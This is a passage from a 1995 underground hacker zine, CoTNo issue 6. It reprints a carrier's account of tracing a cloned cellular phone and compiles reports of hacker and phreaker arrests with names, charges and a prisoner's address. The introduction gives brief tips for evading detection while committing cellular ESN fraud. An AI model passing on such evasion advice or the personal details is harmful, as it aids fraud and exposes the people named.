informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/COTNO/cotno06.phk

3578 lines
167 KiB
Plaintext
Raw Permalink Normal View History

Initial commit
2021-04-15 11:31:59 -07:00
______ ______ _____________ ____ ___ ______
/ ____|\ / \ /____ ____/\ / | \ / / | / \
/ / ____\| / __ |\ \_/ /\____\/ / | / / / / __ |\
/ / / / /__/ / | / / / / /| |/ / / / /__/ / |
/ /__/______ | / / / / / / / | / / | / /
|____________|\ |\_____ / / /__ / / /___/ / |___/ / |\_____ / /
|_____________\| \|____| / \__\ / |___ |/ |___|/ \|____| /
____
/ \ ---
/ \ \ __
/ /\ \ \ \
_/______|_/ / / / \
| | / / / /
| ---\( |/ / / /
| \|\(/ \(/\(/
| |
/ /
/ \ /
/ \ ___/
/
/
/
Communications of The New Order
Issue #6
Fall 1995
"There is nothing more difficult to take in and, more perilous
to conduct, or more uncertain in its success, than to take the
lead in a new order of things."
- Niccolo Machiavelli'
Cavalier........"I hacked codes to get warez for free drugs."
Dead Kat........"I have non-hacker friends but fuck if I keep in
contact with them, they don't have k0d3z."
Disorder........"US West knew we were getting their stuff, they
just didn't know we were on the deferred payment
plan."
Edison.........."I said fuck you cop.. well I wish I had said that."
Major..........."SUNOS... the swiss cheese of unix."
Voyager........."I don't think money is as powerful as fear, but
I have a day job."
Special Thanks: Gatsby, Mark Tabas, The Doktor, Presence,
Demonika, Rage (303), Invalid Media, Deathstar, KevinTX,
Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne,
Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist,
Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.
Good Luck: Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo,
Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson,
BernieS, Kevin Mitnick, Alphabits.
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
__/\iNTRo/\__
CoTNo is a 'zine of the computer underground of the 1990's. It is written
for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience. All
the information published herein is as accurate as possible and pertains to
techniques and devices that actually work. We do not publish any article
that is not of an H/P nature. If you wish to comment on or contribute to
CoTNo, email one of us, or catch one of us on the iRC or try to catch
us in your local Telco dumpster.
Ahem...
This issue is dedicated to all of our good friends who have recently been
busted. In fact, the last three issues are dedicated to them, since there
have been more people busted in the last twelve months then at any time since
Sundevil. In issue four I espoused my opinion that there was a federal
conspiracy at work with paid informants masquerading as our friends. Last
issue I gave detailed information on one of our own busted members, John
Falcon. In this issue there will be information you can use to help keep
yourself out of jail.
In this issue, Disorder has compiled detailed information on the busts of
lasts twelve months. Each bust that we heard of is detailed with names and
events. Hindsight is always clearer than foresight, so hopefully you can
learn from these busts how to avoid a similar fate. Also in this issue, I
am releasing confidential information on how cellular fraud is prevented.
The information is straight from a national cellular carrier and details
exactly how the telcos detect, trace, and bust cellular abuse. This
information should convince you to take the utmost precautions if you are
experimenting with cellular technology. Lastly, John Falcon sent me an
article on what to do if you do get busted. I think this is the first H/P
article ever written from jail!
The following information was an actual article from Cellular One that was
distributed to some of their employees. This article was not edited in
anyway, and contains the best information I have ever seen on how cellular
fraud is prevented. If you are participating in cellular phreaking, I
recommend that you read this article very closely and take it as a warning
from the Cellular Telephone industry. They are getting serious about halting
cellular fraud, and for good reason. In New York for instance, often
there are more fraudulent cellular calls than legitimate ones on any given
day! The Fedz are on their side too. As you may already know, the Fedz ran
an underground BBS for 8 months this year just to catch Cellular Fraudsters.
In fact, Kevin Mitnick was recently busted using the same methods described
in the following article.
The article, dated February 1995, follows:
A team of five Cellular One employees helped stop cellular fraud in Denver
last week. To protect both our employees and future investigations,
Cellular One team members names will not be released.
California officials tracked a suspect from the Los Angeles area using a
cloned cellular phone to Denver early last week and asked Cellular One for
assistance in locating this suspect. With the cloned cellular phone number
and a number the suspect repeatedly called in California, the five Cellular
One employees and both local and California law enforcement agents began
tracking the whereabouts of the suspect through the pattern of his cellular
phone calls.
Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an
RSAT Plus, and hours of labor, the Cellular One team identified the suspect's
calling patterns. An AMA search is a record of an individual cellular
phone number's calls. The cellular number is input along with the
parameters for the search - start and finish date and time - and a log is
printed which shows each individual call made by that cellular number.
This tool is used generally within three days of the calls which you wish
to observe. AMA searches were compiled over several days to document the
calling patterns of the suspect.
While the AMA searches show the past calling pattern, when attempting to
capture a cellular fraud suspect, real time tools must also be used. The
Cellular One team used RFCALL Trace which tracks similar information as an
AMA record with the exception that the information can be collected with
only a 10 second delay from real time. RFCALL Trace also tracks the
individual radio in use, any handoffs, and the signal strength of
the cellular call. Law enforcement agents issued a subpoena to Cellular One
for all information regarding the fraudulent cellular phone number's
activity on our system.
Most of the fraudulent phone calls were being placed between 10am and
midnight. Tracking which cell sites, cell faces, and radios the suspect's
calls set up on identified a small geographical area as the suspect's base of
action. Once an area had been established, one team member drove this area
using an RSAT Plus, an IFR 1500, and a directional antenna (all basic
cellular test equipment used in system optimization) to pinpoint the suspect's
location to a specific apartment complex. This team me tracked the calls
made by the suspects's cellular number and, watching the faces serving the
calls and he handoffs made by the system during the suspect's calls, he was
able to narrow down the location from which the calls were made to a specific
side of one apartment building.
The law enforcement agents, equipped with their own brand of cellular fraud-
busting tools, asked if the Cellular One team could identify the actual
apartment within the building where the calls were being placed. A narrowband
directional antenna was set to the transmit frequency of the cloned phone.
One problem was that with each new phone call, the frequency being tracked
changed. The suspect made short calls, most around one minute, with the
longest between three to five minutes. Using the directional antenna
and resetting the frequency with each new call on the cloned phone, the
Cellular One employee identified a group of apartments within the building
from which the cellular calls were being placed.
Unfortunately, the suspect slipped out of the building before the specific
apartment was identified. Again using RFCALL Trace, the Cellular One team
logged the suspect's next phone call on a cell site near Stapleton
Airport. Law enforcement was notified and kept aware of the phone calls as
the suspect traveled throughout the system. It became evident that the
suspect was moving back toward the apartment complex. Surveillance
officers outside the apartment noticed three men enter just moments before
the Cellular One team notified them that a call had been placed from the
apartment. Within 20 minutes, the suspects again left the apartment.
Denver Police began pursuit of the suspect and made the arrest. Five
additional cellular phones were found in the suspect's apartment. It has
not been determined if these phones are cloned.
Although cellular fraud exists, it is possible to catch the criminals.
Congratulations to our fraud busters! Cellular One asks that you keep this
story confidential since the specifics of this and future investigations
depend on our ability to catch the criminals in action.
End of Cellular One Article.
Pretty scary, huh? Cellular phreaking used to be considered pretty safe, but
times have changed. The cellular phone companies are losing so much money on
cellular fraud, that they have made busting the cellular hackers a priority.
If you do commit cellular fraud, I suggest you use the following guidelines:
1. Never use the fraudulent ESN for over two weeks.
2. Change ESN's as often as possible.
3. Avoid creating a calling pattern with your fraudulent ESN.
4. Avoid using the fraudulent ESN from a stationary location.
These tips could keep you out of jail! Because you cannot divert with a
cellular phone (unless you are Kevin Mitnick) these precautions are necessary.
As my friend John Falcon told me, "Its not worth doing time for silly phone
shit." He's right. H/P is fun, but anyone who has gotten busted will tell
you the same.
But if despite these warnings, you still decide to cellular phreak, just make
this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."
|>ead|<at
-=(TNo)=-
Table of Contents
~~~~~~~~~~~~~~~~~
Introduction......................................Dead Kat
Operation Phundevil...............................Disorder
What Happens When You Get Caught..................John Falcon
Legal and Technical Aspects of RF Monitoring......Major
The Tao of 1AESS..................................Dead Kat & Disorder
Frequently Visited AT&T Locations.................Major & Dead Kat
Remote Hacking in Unix............................Voyager
The Definity Audix VMS Inside Out.................Boba Fett
Bridging the Gap..................................Eddie Van Halen
Elite Music Part V................................Disk Jockey
Conclusion........................................Dead Kat
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-= Operation Phundevil =-
by DisordeR[TNo]
With all the busts happening in the past year, and a lack of
information in the scene regarding who got busted when, and for what,
I decided to put this article together. After working on this for a
while, I realized that not only was it a little difficult in finding
bust info, but half of the little you found was bullshit.
The information in the following article is as accurate as I
can find. With all the different accounts of what happened, different
nicknames, different NPA's, and pure stupidity out there, don't bet your
life on the information contained within this article.
The following sections give you some details about some busts,
and RUMORS of others. I indicate which are rumors and which are legit.
I utilized everything from BBS posts, to newspaper articles, to word
of mouth. Thanks to those who helped me on this. And by no means is this
NEAR complete...
=-=
"OPERATION CYBERSNARE: FEDZ = 1, PHREAKZ = 0"
Main Thugs:
Peter A. Cavicchia II - Special Agent in Charge
Donna Krappa - Assistant U.S. Attorney in Newark
Stacey Bauerschmidt - "Carder One"
The Busted:
Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break
into the Portland, Oregon AT&T Wireless computers.
Kevin Watkins - "Led" - Houston, Texas: Accused of conspiring to break
into the Portland, Oregon AT&T Wireless computers.
Watkins used the computer system of Embry Riddle University in
Prescott, Ariz., to enter the McCaw computer, Secret Service
Special Agent Stacey Bauerschmidt said in a sworn statement.
Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused
of trafficking in cloned cellular phones/equipment and stolen
access devices (ESN/MIN Pairs).
Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in
stolen access devices.
Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in
unauthorized access devices.
Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing
and trafficking in hardware used to obtain unauthorized access to
telecommunications services.
Penalty:
If convicted, defendants face maximum possible sentences ranging
from 15 years for Cushing to 10 years for Bradford, Clarkson and
Natoli and five years for Lacap and Watkins.
Details:
Starting in January, Stacey Bauerschmidt and other Secret Service
agents in Newark, NJ, set up what is now called "an electronic chop shop"
by the press. Stacey (in cooperation with a 'nameless informer' who will
be mentioned later) set up a computer BBS called "Celco 51" with the
intent of busting hackers and phreakers specializing in cellular phone
fraud.
For the first sixth months, the board operated using MBBS with
four nodes. At any given time the board had an 800 re-route (not really)
so that the users could call without any problem (ANI). To the credit of
the agents in charge, the board did not allow just anyone access. The sysop
(PMF) appeared to discriminate and only allow the 'elite' members of the
H/P community on. With the illusion of security, the agents running the
board could successfully monitor the users, and begin to make deals with
the hackers.
Stacey [Who went by 'Carder One'] continually asked members of the
BBS if they were interested in selling ESN/MIN pairs [Used for cellular
phone fraud]. These 'pairs' are considered 'illegal access devices' and
are usually found in large enough amounts to consist of felonies. On top
of the illegal access devices, Stacey was looking for people that were
willing to sell illegal cloning equipment. This equipment consisted of
devices used to get pairs, clone phones, and reprogram phones.
The operation was very successful in many ways, notably the ability
of the agents to mask the true nature of the board. For over eight months,
Stacey and other agents monitored the board looking for any chance to
prosecute any of the members. The sysop (PMF) continuously advertised the
board to the members, as well as mailed and HARASSED members into calling
more than they wished to (Entrapment anyone?). PMF was responsible for
mailing members up to three times a day, message flooding people on IRC,
and using other methods of harassment to get hackers to call.
On top of the harassment, Carder One continuously asked for people
to post 'pairs' as well as sell them in private. In a few cases, individuals
would not have considered selling these pairs had the federal agents not
harassed them so much. Ahem.
"Cushing and five others were arrested in four states during a
sweep last week by federal agents. Another 14 raids spread over eight
states led to the confiscation of 31 computers, 65 illegally programmed
phones and 14 "readers," devices used to illegally pluck cellular phone
numbers and serial codes from cellular phone transmissions."
[Wonder who's computer will run the next sting board?]
"But because the alleged crooks posted phone numbers on the bulletin
board indicating where they could be reached, the Secret Service was able to
trace the calls, leading to the arrests."
[Need we emphasize the importance of Diverting any more?]
"But officials said this case represented the first time that the
Secret Service had created an entirely new computer bulletin board..."
[Couldn't bust any warez kiddies recently...]
[Watch out kiddies... They are using more than 'questionable' methods
of busting hackers and phreaks these days. If you haven't met someone,
be careful of what you post on their systems.. many people thought
PMF was cool until he NARKED on everyone that he could.]
=-=
"ANARCHIST BUSTED FOR WRITING MAGAZINE"
From: The Anarchives <tao@presence.lglobal.com>
In early march of 1995 I was arrested for "Unauthorized Use Of A Computer".
Three large, white, plain-clothes detectives from 52 division in downtown
toronto came to my house, promptly arrested me, took me to a holding
cell, and conducted a strip search (looking for codes I guess). I was
held in custody for four hours (7:30 pm to 11:30 pm), and released as a
result of substantial protest made by friends and family at the sergeants
desk.
I was being accused of breaking into the computer systems at the
University Of Toronto for the purpose of publishing "Anarchist
newsletters".
The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie
<gorrie@ecf.utoronto.ca>, saw someone on his system publishing Anarchist
materials, assumed I was a malicious "hacker", turned over all records of
my email, news posts, key strokes, you name it, to the police at 52
division. The police realizing how dangerous these "hacker anarchist"
types are, had to come to my house to cuff me, bring me down, and strip
search me.
I was to face trial for a possible six months in prison, just for
exercising my democratic rights and responsibilities.
Of course the end result was that the charges were dropped, although this
was not until several months later (sept 7, 95), after several
appearances in court, and after my agreeing to pay $400 to the skule.
=-=
"FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
by, Denny Walsh
From: The Sacramento Bee
Saturday Sept. 16, 1995
Two talented Berkeley hackers were charged Friday with computer-
age crimes against a Tower Video rental store in Sacramento, federal
authorities said, in large part because they went up against Tower's even
more talented electronic security corps.
When authorities raided their apartment last month, Terry Patrick Ewing,
21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower
customers, federal prosecutors said.
According to a federal grand jury indictment, Ewing and Kim used
their personal computer to break into a system know as TRON, owned and
operated by Tower's West Sacramento-based parent, MTS Inc.
Kim and Ewing are charged in a three-count indictment with
conspiracy, fraud and the unauthorized destruction of computer data.
The prosecutor said the pair are not in custody and will be
allowed to surrender next week. He said he does not see them as flight
risks.
=-=
"KEVIN MITNICK BUST - HIGHLIGHTS"
From Multiple Sources
If you want more details, read the hundreds of articles about this story.
Also, read the Phrack 47 editorial pertaining to this subject.
Kevin Mitnick (31)
-One of the first indicted under Computer Security Act of 1987
-Search began in November 1992
-Mark Seiden (expert in firewalls) discovered that someone had obtained
all of Netcom's credit card numbers for 20,000 online subscribers.
-Stole files from: Motorola, Apple, Netcom, and more.
-Mitnick used the Well as a repository for files he stole from computer
security expert Tsutoma Shimomura.
-After raping Tsutoma, he used Bruce Koball's account to transfer
proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm,
and other cell manufacturers.
-Shimomura concluded that it was Mitnick, and that he was operating
through cellular, from Raleigh, NC
-Mitnick was bouncing his calls through GTE Switches, local switches,
and a few types of cellular switches, and utilized Netcom's dialins.
-Lived in Player's Court, a 12-unit apartment building in suburb of
Duraliegh Hills, three miles from the airport. He lived in Apt 202.
-Until a week or two before he was arrested, FBI surveillance agents in
Los Angeles were certain that 'the intruder' was somewhere in Colorado.
-FBI arrested him at 24 hour stakeout
-Arrested in Raleigh, N.C. at 1:30 a.m.
=-=
"PHREAKS BUSTED IN NY... MORE TO COME"
"Ok all Listen up and listen good. resistance is down. Maybe permanently. Most
of you prolly haven't heard yet, but there have been major busts going around.
... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire
have been busted. ... that they even busted craig neidorf(knight lightnig)
again.
More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop
calling. The SS who raided hellfire slipped a bit and bragged about being on
those boards.
Hellfire said the feds were mostly interested in credit cards,
VMB's, and Cell phones.
They are looking to bust for cellular, VMB's and credit cards...
Tokien entry i found out has been in jail for 2 days!
Neon Samurai was busted for credit cards and also for telco equipment that
the nynex people said was worth 50,000. "
PMFs (Narc) reply:
"dude, this is utter shit and i expect u to post this reply for me seeing
as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs
among others, he was the only person busted and nothing to do with his
busts was EVER mentioned on my board. He doesn't even get involved in
cellphones, he was busted coz he and every other person busted used
1 800 CALL ATT from his house.. what a bunch of lamers... I don't even
know who wrote that next but i would like to find out.. probably the guys
from NYHE..."
[Ironic isn't it!]
=-=
"ALPHABITS ORIGINAL BUST LAST YEAR"
Caught alphabits on irc lastnight and he said:
<alphabits> but I got sent to prison 7 months ago, and lost contact ***
According to different people, he was busted for check fraud and/or credit
fraud and/or cellular fraud. Unfortunately, I will not be able to talk
to him until after this article.
=-=
"SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
From another group member:
Syncomm was talking on the phone.. the day before Master of Reality got
busted... so MOR, Greg and equinox were sitting there chatting away when
a load of federal agents <SS, FBI, 1 NSA guy and even a guy from customs>
and some local police busted down his door. He dropped the phone and all
they heard was a rustle of papers .. then a "Secure that paper!" then a
click.. They put a shotgun to his head and said "Hello Syncomm". They
said he was the leader of S.O.B. an international terrorist organization.
Then again they thought that Crypt Keeper and MOR were also the sole
leader of SOB ... So then they put a knee to his back and handcuffed him
<Greg, 16, apparently posed a serious threat>. They proceeded to
interrogate.. and at one point this one agent <female> tried to seduce him
into talking <I think he would of he she did more .. ;)> ..
He was finaly was lead outside when his neighbor walked up to them and
handed them all of Greg's notes, etc.. that greg had asked him to stash..
Greg then threatened his neighbors life.. <which he came back to do
unhandcuffed afterwards> and was led off to holding... were they produced
"A big fucking printout" that apparently detailed Greg's activities.. they
nailed him for hacking UC and then accused him of crashing their
systems.. Along with criminal tools <his computer> and some other
offenses.. <one of which I am sure of is Wire Fraud.. they love that>
=-=
"FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz
that has software companies upset to see piracy extending
into the CD-ROM format.
From the Associated Press, Saturday Dec 24 1994
BUFFALO, New York - The FBI has arrested a Canadian father and son in what
is believed to be the first major case of CD-ROM piracy in the United States.
Agents said Thursday they seized 15,000 counterfeit copies of the popular
CD Rom games REBEL ASSAULT and MYST that were being sold at 25% of retail
value.
PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of
CHICAGO were arrested in Buffalo and charged with felony copyright infringe-
ment. The counterfeit goods were recovered in a Niagara Country warehouse
authorities said.
The FBI told the Los Angeles Times that additional warrants were served in
INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling
the illegal software. MORE ARRESTS ARE EXPECTED.
=-=
"MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"
TORONTO - Canadian, US and European investigators
have cracked a ring of computer hackers who allegedly
stole about $5 million US$ by breaking into the
computers of phone companies and other firms.
The 12 hackers who met over the Internet, used coding
and call switching to conceal the transfer of funds,
codes and communications.
RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED
GUILTY on Tuesday, June 27 1995. He got 90 days in
Jail and 100 hours of community services for HELPING
the RCMP with their investigation - instead of at least
a one year jail sentence.
=-=
"RUMORS FROM 914"
There has been a huge chain of busts in 914. Apparently, GANGSTER,
who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor
goes on to say that he was 'fucking around with CC's' which led to the
bust.
=-=
"WAREZ BUSTS IN 510"
The Sewer Line BBS in 510 met trouble on December 11th due to the
distribution of console warez (from various posts). Rumor also has it,
that a user on the board going by ROCK'N was in fact a sega representative,
and narked on the sysop for his activities.
=-=
"214 BUSTS"
During August of '94, several boards (mostly warez/ansi affiliated)
were raided by the FBI. The busts occurred in the Dallas/Ft. Worth
area, the list follows:
Agents of Fortune [409] (Sysop: Butcher [LEGEND])
Suburbia [214] (Sysop: The Chairman [RZR],
The Network [214] (Sysop: Masterblaster)
The Depths [214] (Sysop: Maelstrom ex-[RZR/iCE])
Elm Street [214] (Sysop: Freddy Krueger)
User to User [214] (Sysop: William Pendergast)
=-=
"PHILLY 2600 MEETING"
From recent posts and word of mouth, the Philadelphia 2600 meetings are
having a hard time making it past 5 minutes. Apparently, local police in
coordination with mall rent-a-cops [joining of forces there], are kicking
hackers and phreakers out of their meeting place based on charges of
loitering and conspiracy [to do what?! Assemble?]. Currently, police
are threatening to break up meetings, and/or jail participants for the
two reasons cited above.
=-=
"FEDZ BUST KID IN MINNESOTA"
November '94, a 15 year old in Minnesota had a pleasant visit by
federal agents. According to newspaper articles, the boy [unnamed
in the article] was basing his hacks out of the Detroit Free-Net.
"He used passwords to gain access to more than 10 computer networks
from Detroit to Moscow". During his time on the Detroit Free-Net,
he was said to have maliciously disabled enough of the system 'forcing'
it to shut down.
Currently, the boy is facing potential charges for using
telecommunications devices to cross state lines, and felony charges
for breaking into computer systems.
Other favorite quotes from the articles about this case:
"...hospitalized, possibly for psychological reasons, when police
confiscated his computer modem and software programs Monday."
"...said the boy appeared to fit the typical hacker profile: a
15- to 20-year-old male, many who have low self-esteem. 'He really
could use a girlfriend instead of a computer' Grewe said."
=-=
"THE TROUBLES OF BERNIE S."
Recently, a lot of press has been covering the story of 'Bernie S'.
You can find more info about his bust on alt.2600 as well as several
'hacker' mailing lists. Here are some of the interesting quotes from
one of those articles:
"Ed Cummings, also known to many in cyberspace as Bernie SS was arrested
on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
of a device to commit Telecommunications fraud charges. He is being held in
Delaware County Prison in lieu of $100,000.00 Bail."
His arrest took place at a local 7-11 where *15* police cars pulled
into the parking lot. During the interaction with the officer, he told
them 'no, you can't search my car', yet minutes later, he noticed
an officer going through the contents of his car. Despite his protests,
the officer removed several timing crystals, tone dialers, and a 'broken
red box'.
The following day, Bernie was at a friend's house when '8 to 10' plain
clothed armed men burst into the house yelling 'freeze'. Minutes later
he was being taken to jail in cuffs. He was not formally charged until
his arraignment where his bail was set to 100,000 dollars because he
refused to talk with the police without counsel present.
"The Judge dropped the two unlawful use of a computer charges due to
the fact that the evidence was circumstantial and the county had no actual
evidence that Ed had ever used the computers in question. As of 3/27/1995
Ed Cummings is still in Delaware County Prison awaiting his trial."
=-=
"RUSSIANS ARREST 6 IN COMPUTER THEFTS"
This article was taken from the Associated Press, Saturday Dec 24 1994
St. Petersburg, Russia, Sept 26 (AP) -- Russian police
officers have arrested six more people in a $10 million
computer theft from Citibank here, but the masterminds are
said to remain at large.
Several people have been arrested abroad and face charges
in the United States, including Vladimir Levin, 28,
reportedly the group's computer hacker.
Citibank officials said they recovered all but $400,000 and
upgraded the cash-management systems's electronic security
after the theft.
FT, Sept 21, 1995.
Extradition in Citibank hacking case
A British court yesterday approved the extradition to the
US of Mr Vladimir Levin, the Russian science graduate
accused of an attempted $10m (6.5m pounds) computer hacking
fraud on Citibank. ...
=-=
"PURPLE CONDOM CAUSES TROUBLE"
Purpcon recently had pleasant meetings with his Dean where he attends
college after getting caught rewriting his magnetic student ID, so
that others would get charged for his meal. :)
=-=
"CoTNo RUMORS"
In past issues of CoTNo we have always said 'good luck to' people
that have been busted (or said to have been busted)..
Deathstar, AntiChrist (school admins?), Coaxial Mayhem,
Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking),
Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello
CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
At the request of some of the above, I can't go into details on their busts.
=-=
"JOHN FALCON BUSTS"
Since rumors about his bust have been running rampant on the 'Net',
here are the facts about the bust... for more info, and JF's reply
to the rumors, read CoTNo 5.
Common myths of my arrest:
1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
2 - Mr. Falcon left his secring.pgp on his system.
3 - FBI/NSA read the RSA encrypted data.
4 - My conviction was because I was a hacker.
Let me go over my conviction:
Count 1: Theft of Government Property - How they caught me: Narc
Count 2: Fraudulent use of an Access Device - How they caught me: Narc
Count 3: Fraudulent use of a Computer - How they caught me: questionable
Count 4: Fraudulent use of an Access Device - How they caught me: Narc
If you would like to get in contact with JF, here is his info:
email: jfalcon@ice_bbs.alaska.net
snailmail: Don Fanning
#12617-006
3600 Guard Road
Lompoc, CA 93436
=-=
"EPSILON, DAMIEN, SHOCKWAVE (303)"
From CoTNo 3 (Read there for full story)
Three Colorado teen-agers are suspected of setting up an elaborate computer-
hacking system that tapped into a long-distance telephone company and stole
secret access codes (k0dez!).
Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup
Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson
County in the alleged scheme.
=-=
"INTERVIEW WITH A CRYPTKEEPER"
ck: I only got busted last February (1994) for hacking
dis: I heard you got hit twice.. once last year, and once a lot more
+recently..
CK: nope, I moved, I didn't get busted. I only got busted last year,
once, that's it. And it wasn't real serious.. not like cellphone/money
laundering..just some inet hacking. I got busted for hacking the
University of Cincinnati and a few other things on the net.. they
traced me through a PBX.. they were serious. They thought I was
a spy. they were pissed to find out I was just a 16 year old.
dis: hmm... bad.. did they just search/seize or what?
ck: search/seized my computer.. I eventually got most of my stuff back
(the computer, monitor, and keyboard) and had to spend 10 days in
juvenile thats about it. oh.. and a big pain in the ass too of
course not bad at all..
dis: anything else?
ck: and tell them I was only busted ONCE, and it wasn't all that serious.
I don't have any plans to get back into the scene (it sux now), but
I do enjoy hearing about it sometimes.
=-=
"FEDZ CATCHING ON TO CALLING CARD SKAMS"
A $50 million telephone calling-card theft ring disclosed
earlier this week by federal investigators is representative of the advanced
types of scams that have emerged in the last two years as telephone companies
have become better at ferreting out fraud.
The Secret Service said Ivy James Lay, a switch engineer at MCI's network
center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI
and other long distance companies, later selling them to 'band of computer
hackers.' The estimated value of the cards lies near $50 million. The
Secret Service (which investigates fraud like this) claims this to be the
largest case of calling card theft to date.
=-=-=
"SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"
Two computer hackers have been sentenced to fed. prison and an accomplice in
Mn. awaits sentencing for his part in an international phone conspiracy.
Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C.,
were part of a hacker ring that stole credit-card numbers from MCI's
Computer terminal in Greensboro. A third member of the ring, Leroy James
Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal
copyright violations.
US District Court Judge James Beaty on Fri. sentenced Lay to tree years
and two months in prison. Stanton, a 22-year-old student at Wingate College,
was sentenced to one year. Anderson's sentencing is expected this summer.
The conspiracy stretched into several European countries and cost long-
distance carriers more than $28 millon, authorities said.
Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking
in unauthorized access devices. The group bought and sold at least 50,000
numbers from 1992 until the summer of 1994, according to court documents.
"What I did was very stupid," Stanton told Judge Beaty at his sentencing.
"I'd like to go back and finish college."
=-=-=
"SHOCKER[303] GETS NAILED FOR CC'S"
Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone
bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda
listened to you. Fuck me. Got my mac taken away, I am writing this from a
friends, I am not supposed to be here either, but hell, I got everything taken
away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what
happens, I'll call you sometime if I can get to the phone w/out my parents
knowing. I can't have anything back until I pay for this shit, I think it is
between $400 and $500, not sure, I already paid $170, but then I hafta
fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I
got like, a felony and a second degree misdemeanor for that shit, they
will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony)
and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll
see ya ok? Bye..
=-=-=
"NYHE RUMORS"
The New York Hack Exchange got busted for scams and cellfonez...
(Someone mail me with more than a rumor please)
=-=-=
"WAREZ BOARD BUSTS AROUND THE COUNTRY"
Bad Sector [BUSTED!]
Beyond Corruption [BUSTED!]
Jurrasic Park [BUSTED!]
Lineup [BUSTED!]
Main Frame [BUSTED!]
Necronomicon [BUSTED!]
No BBS [BUSTED!]
The Notice [BUSTED!]
On The World [BUSTED!]
Perfect Crime [BUSTED!]
Red Alert [BUSTED!]
Restricted Area [BUSTED!]
Rubbish Heap [BUSTED!]
Skull Island [BUSTED!]
Twins [BUSTED!]
The Underworld [BUSTED!]
Wolf Pack [BUSTED!]
15 Arrests
75 RCMP Officers Involved
Removed at least 11 BBSs in one day
Seized more than $200,000 in computer hardware
Operation/Investigation lasted 6 months to 1 year
April 12, 1995
Busts are localized in Montreal
514 NPA
=-=-=
"DUTCH HACKER ARRESTED"
(from CUD 7.21):
--------------Original message----------------
UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has
become the first person to be convicted of computer hacking in the
Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science
student, was handed down a six month suspended sentence by
magistrates last week, and was fined around $3,200
Oosteveen was accused of breaking into university, corporate and
government computers, following his arrested in March, 1993, just
three weeks after new Dutch anti-hacking legislation came into force.
Oosteveen was caught in the act of trying to hack into the computer
lines of a technical university in Delft near The Hague. He is also
thought to have been responsible for previous hacking attacks which
occurred before the new legislation came into force.
=-=-=
"THE EAST COAST"
Tabas and Others Bust:
According to Gatsby, the following were busted: Himself, Mark Tabas
KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker.
(When I talked to him, he wasn't able to say much since it was the day
after the bust)
From empire Times:
February 22, 1995
One thing all the people have in common: Southwestern Bell - or at the very
least, the desire and ability to hack all the switches on the west coast.
According to those involved, it goes way beyond switches...
=-=-=
"THE LAMACCHIA CASE"
April 94:
BOSTON, MA ...A federal grand jury returned a felony indictment today
charging an MIT student in a computer fraud scheme resulting in the piracy of
an estimated million dollars in business and entertainment computer software.
United States Attorney Donald K. Stern and FBI Special Agent In
Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20,
currently a junior at the Massachusetts Institute of Technology, was charged
in a one count felony indictment with conspiring to commit wire fraud. The
indictment charges that between November 21, 1993 and January 5, 1994
LAMACCHIA operated a computer bulletin board service that permitted users
to copy copyrighted business and entertainment software without paying to
purchase the software. The bulletin board was operated without authorization
on MIT computer work stations and was accessible to users worldwide over the
Internet... [Losses] are estimated to exceed a million dollars. [bahaha]
=-=-=
"BRITISH CALLING CARD BUST"
British students have taken part in an alleged <20>65m computer fraud,
involving the electronic theft of cards that allow users to make free
